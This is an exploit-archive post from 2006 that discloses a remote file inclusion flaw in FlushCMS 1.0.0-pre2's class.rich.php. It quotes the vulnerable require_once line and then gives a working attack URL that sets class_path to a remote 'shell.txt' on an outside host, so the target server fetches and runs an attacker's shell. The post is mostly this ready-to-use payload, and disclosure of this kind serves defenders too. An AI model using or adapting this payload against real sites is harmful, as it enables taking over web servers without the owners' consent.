[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : FlushCMS <= 1.0.0-pre2 (class.rich.php) Remote Inclusion Vulnerability
# Published : 2006-07-16
# Author : igi
# Previous Title : MiniBB Mambo Component <= 1.5a Remote File Include Vulnerabilities
# Next Title : MyBulletinBoard (MyBB) <= 1.1.5 (CLIENT-IP) SQL Injection Exploit
flushcms (tpath) Remote File Inclusion Vulnerability
virangar security team
www.virangar.org
www.virangar.net
Discoverd By : igi
contact : anti_hacker_online@yah00.com
for all member virangar
bug:
----------------------------------------------------------------------------------------
//language class
require_once($class_path.'rich_files/lang/class.rich_lang.php');
-----------------------------------------------------------------------------------------
simple:http://www.site.com/flushcmd/Include/editor/rich_files/class.rich.php?class_path=http://www.shell.com/shell.txt?
# www.Syue.com [2006-07-16]